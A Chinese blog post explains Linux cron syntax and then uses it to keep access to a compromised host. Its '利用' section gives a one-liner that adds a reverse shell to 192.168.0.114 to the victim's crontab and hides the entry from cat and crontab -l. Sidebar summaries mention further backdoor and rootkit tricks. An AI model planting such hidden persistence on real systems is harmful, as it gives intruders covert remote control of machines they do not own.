Linux权限维持(五)

最新推荐文章于 2024-02-26 02:05:43 发布
最新推荐文章于 2024-02-26 02:05:43 发布
阅读量109 收藏
点赞数
文章标签: linux 运维 服务器
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/pingan233/article/details/129168722
版权

利用Cron机制安装后门

Cron是ubuntu下默认启动的用户执行计划。它会按照设置,在固定的周期或者按照一定时间执行某一个任务。

1、crontab命令选项

# crontab -u 
-u指定一个用户
​
-l列出某个用户的任务计划
​
-r删除某个用户的任务
​
-e编辑某个用户的任务

2、cron 文件写法

可用crontab -e命令来编辑,编辑的是/var/spool/cron下对应用户的cron文件,也可以直接修改/etc/crontab文件。

Minute Hour Day Month Week command
​
分钟 小时 天 月 星期 命令
​
0-59 0-23 1-31 1-12 0-6 command
​
Minute 每个小时的第几分钟执行该任务
​
Hour 每天的第几个小时执行该任务
​
Day 每月的第几天执行该任务
​
Month 每年的第几个月执行该任务
​
DayOfWeek 每周的第几天执行该任务,0表示周日
​
Command 指定要执行的程序、脚本或命令

3、特殊符号的含义

星号(*):代表所有可能的值,例如month字段如果是星号,则表示在满足其它字段的制约条件后每月都执行该命令操作。

逗号(,):可以用逗号隔开的值指定一个列表范围,例如,“1,2,5,7,8,9”

中杠(-):可以用整数之间的中杠表示一个整数范围,例如“2-6”表示“2,3,4,5,6”

正斜线(/):可以用正斜线指定时间的间隔频率,例如“0-23/2”表示每两小时执行一次。同时正斜线可以和星号一起使用,例如*/10,如果用在minute字段,表示每十分钟执行一次。

4、常用命令

vi /etc/crontab  ## cron配置文件路径
​
/etc/init.d/crond restart  ##重启cron
​
查看cron服务情况
​
service crond status  ##crond服务状态
​
service crond stop    ##crond服务关闭
​
service crond start   ##crond服务打开
​
cat /var/log/cron  ##查看cron日志
​
chmod +x filename  ##将脚本改成可执行

5、常用示例

5  * * * * ls ##指定每小时的第5分钟执行一次ls命令
​
30 5 * * * ls ##指定每天的 5:30 执行ls命令
​
30 7 8 * * ls ##指定每月8号的7:30分执行ls命令
​
30 5 8 6 * ls ##指定每年的6月8日5:30执行ls命令
​
30 6 * * 0 ls ##指定每星期日的6:30执行ls命令[注:0表示星期天,1表示星期1,以此类推,也可以用英文来表示,sun表示星期天,mon表示星期一等。]
​
30 3 10,20 * * ls ##每月10号及20号的3:30执行ls命令[注:“,”用来连接多个不连续的时段]
​
25 8-11 * * * ls ##每天8-11点的第25分钟执行ls命令[注:“-”用来连接连续的时段] */15 * * * * ls 每15分钟执行一次ls命令 [即每个小时的第0 15 30 45 60分钟执行ls命令 ]
​
30 6 */10 * * ls ##每个月中,每隔10天6:30执行一次ls命令[即每月的1、11、21、31日是的6:30执行一次ls命令 ]

每天7:50以root 身份执行/etc/cron.daily目录中的所有可执行文件

50 7 * * * root run-parts /etc/cron.daily [ 注:run-parts参数表示,执行后面目录中的所有可执行文件]

第10、20、30分钟输出到/tmp/cron1.txt:

10,20,30 * * * * echo “第10、20、30分钟输出一次” >> /tmp/cron1.txt

以用户web的身份每两小时就运行某个程序:

0 */2 * * * web /usr/bin/somecommand >> /dev/null 2>&1

6、利用

可以使用基本的服务查看状态命令等查看信息。

service cron status

查看用户的执行计划。(如果你显示没有计划不要着急,后面加上cron.allow和cron.deny就有了)

crontab -l ##列出任务
crontab -e ##编辑任务

我们可以通过将反弹shell加入到定时任务内进行执行:

(crontab -l;printf "* * * * * /bin/bash -c '/bin/sh -i >& /dev/tcp/192.168.0.114/2334 0>&1';\r%100c\n")|crontab -

而且我们会发现在受害机上查询定时任务会查询不到东西:

这个是因为我们在编辑定时任务时加进去的 \r%100c\n ,这个在Linux下的cat等命令是默认无法显示出来的,对于隐藏痕迹有一些好处。

不会代码的靓仔关
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
【内网安全】——Linux权限维持
Demo不是emo的博客
02-26 4406
Linux常见的权限维持姿势
linux权限维持
qq_44704184的博客
07-08 2085
linux权限维持
Linux 权限维持手法
qq_53742230的博客
07-21 1974
Linux 权限维持手法
LINUX权限维持
m0_65096687的博客
06-24 612
添加超级用户的方式有很多种,这里直接拿到root权限后创建一个用户,在/etc/passwd/中修改用户id值为0。Linux提权操作中有个suid提权。在对方主机中查看是否又以下文件·第一个星号是分钟,这里没有加就是过一会就执行。得到对方主机权限后,在目录中写入命令执行脚本。然后就可以利用suid提权来权限维持。拿到对方的root权限后,关闭防火墙。把这些文件加上SUID。然后攻击机开启nc监听。然后在计划任务中配置。
权限维持Linux&Rootkit后门&Strace监控&Alias别名&Cron定时任务
今天是几号的博客
04-16 1277
alias命令的功能:为命令设置别名定义:alias ls = ‘ls -al’删除:unalias ls每次输入ls命令的时候都能实现ls -alalerts'这样目标执行ls命令后可以上线,不过ls命令会被阻塞在那里,很容易引起怀疑,当结束终端窗口时,反弹shell的会话也会随着被终结,而且更改后的alias命令只在当前窗口才有效(重启也会失效)2、升级:))";alerts’进行base64编码是因为python程序有空行和空格,将一段命令转换成单行命令。
linux权限维持.pdf
03-31
linux权限维持.pdf
[总结]Linux权限维持1
08-03
1.[总结]SQL注总结 3.[后渗透]多姿势绕过 Powershell 调保护 5.[总结]加载 DLL 的多种式 7.[逆向]PE件格式解析 3. [WEB
linux suid权限维持速查表1
08-03
linux suid权限维持速查表linux suid 权限维持速查表赋权姿势:linux suid权限维持速查表linux suid权限维持速查表linux
网络安全-渗透中的权限维持-杨晓成-360
02-01
网络安全-渗透中的权限维持-杨晓成-360-下载版 权限维持 Windows相关 Linux相关 中间件 webshell
Linux内网渗透.doc
07-08
本文将从拿到一个 Linux shell 开始,介绍 Linux 内网渗透技术,分为容器逃逸、Linux 提权、Linux 信息收集、Linux 隧道技术、Linux 横向移动、Linux 权限维持Linux 痕迹清理几个部分。 一、容器逃逸 容器逃逸是...
Linux权限维持
最新发布
2403_82795493的博客
02-26 568
在攻击者利用漏洞获取到某台机器的控制权限之后,会考虑将该机器作为一个持久化的据点,种植一个具备持久化的后门,从而随时可以连接该被控机器进行深入渗透。
Linux权限维持(六)
pingan233的博客
02-25 298
# “2”在linux中代表错误输出,“1”在linux中代表标准输出,在此处也就是nohup的输出。#mount --bind命令是将前一个目录挂载到后一个目录上,所有对后一个目录的访问其实都是对前一个目录的访问,并且会将前一个目录路径隐藏起来(注意这里只是隐藏不是删除,数据未发生改变,仅仅是无法访问了)。一般来说我们是做一个正向连接后门,因为反向后门的代码里面没有循环,并不能进行长时间的连接。其中,恶意脚本 dir.py 的内容可以是任何功能的后门,比如上面的监听本地11端口。
Linux下常见的权限维持方式
热门推荐
03-06 2万+
攻击者在获取系统权限后,通常会留下后门以便再次访问。本文将对Linux下常见的权限维持技术进行解析,知己知彼百战不殆。相关文章:Linux下的几种隐藏技术1、一句话添加用户和密码添加普...
Linux权限维持方法论
大河之犬的博客
06-19 555
Mafix是一款常用的轻量应用级别Rootkits,是通过伪造ssh协议漏洞实现远程登陆,特点是配置简单并可以自定义验证密码和端口号。通过命令替换动态跟踪系统调用和数据,可以用来记录用户ssh、su、sudo的操作。strace不只是可以监听连接他人,还可以用来抓到别人连入的密码。此时我们任何使用ssh登录或者切换用户的操作,密码都会被记录到。文件中,这种方法的缺点是生成的log文件特别大,且容易引起怀疑。其中111111为你连接后门程序时的密码,7777为连接的端口。会获取一个root的shell。
Linux权限维持有哪些方法
04-29
Linux权限维持的方法有很多,其中一些常见的方法包括: 1. 提权攻击:攻击者利用系统中存在的漏洞获取root权限。 2. 密码猜测:攻击者通过猜测密码来获取用户的权限。 3. 社会工程学攻击:攻击者通过欺骗用户来...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值